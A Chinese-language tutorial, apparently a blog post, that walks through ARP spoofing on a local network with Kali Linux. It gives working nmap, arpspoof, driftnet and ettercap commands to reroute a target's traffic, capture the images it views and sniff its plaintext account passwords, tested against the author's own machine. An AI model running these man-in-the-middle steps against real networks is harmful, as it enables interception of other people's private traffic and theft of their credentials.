arp攻击上篇文章介绍了arp攻击让目标断网,这次我们利用arp欺骗直接抓取目标流量以获得目标的数据,截获图片,密码等。
什么是arp欺骗
如果arp攻击是使对方断网的话,那么arp欺骗就是不仅不能让对方断网,还要对方的流量先通过我这里再转发出去
需要工具
kali linux
nmap
arpspoof
ettercap
driftnet
介绍
kali就不用介绍了,我们的操作都是在这个系统中,nmap,arpspoof在上篇文章都有介绍,ettercap:最初设计为交换网上的sniffer,但是随着发展,它获得了越来越多的功能,成为一款有效的、灵活的中介攻击工具。它支持主动及被动的协议解析并包含了许多网络和主机特性(如OS指纹等)分析,总之可以简单理解为可以抓取数据包。driftnet :一款简单的图片捕获工具,可以很方便的在网络数据包中抓取图片。
用法举例:
ettercap -Tq -i eth0 //这条命令表示监控eth0网卡的流量
-T 文本模式运行 -q 安静模式 -i 网卡,后接网卡名
driftnet -i wlan0 //捕获经过eth0的图片并显示
-i 网卡,后接网卡名
步骤
首先在kali中打开终端,输入ifconfig得到自己网卡和ip
ifconfig
然后利用nmap工具监测局域网下存活主机,确定一个目标
nmap -sP 192.168.1.0/24 //-sP后面根据自己网络填网段
接下来是用arpspoof,但是linux默认是不开启ip转发的,所以我们这里手动开启,关于ip转发的配置文件写在/proc/sys/net/ipv4的ip_forward中,默认为0(不转发),我们改成1(为1的话目标不会断网)
echo 1 >/proc/sys/net/ipv4/ip_forward //这句意思是向这个文件写入1
(当然以后如果想实行断网攻击的话,可以设置回来:echo 0 >/proc/sys/net/ipv4/ip_forward)
然后
arpspoof -i eth0 -t 192.168.1.201 192.168.1.1 //-i后面是网卡,-t 后面填目标ip 最后的填网关
由于开启了ip转发,所以目标主机不会断网,而流量会经过我们当前的kali
既然目标流量会经过我们这里,那么开启一下driftnet ,便可捕获图片,我们新开一个终端,输入命令
driftnet -i eth0
可以看到弹出一个窗口,这个便是显示图片的地方,当目标浏览图片时,我们便可以捕获(当前kali浏览图片一样会被捕获),比如我让当前靶机(靶机是我当前电脑,kali运行于虚拟机)看一下我QQ空间
好了,图片捕获到此结束,接下来我们用ettercap来抓取账号密码,现在可以关掉driftnet这个窗口(不要关运行arpspoof的窗口)
在终端输入
ettercap -Tq -i eth0
这样便是准备就绪,接下里我在靶机登录一下我某个网站的账号
登录后便直接抓取到了账号和密码(这里直接是明文),然后如果要停止抓获,按ctrl+c
ok,教程到此结束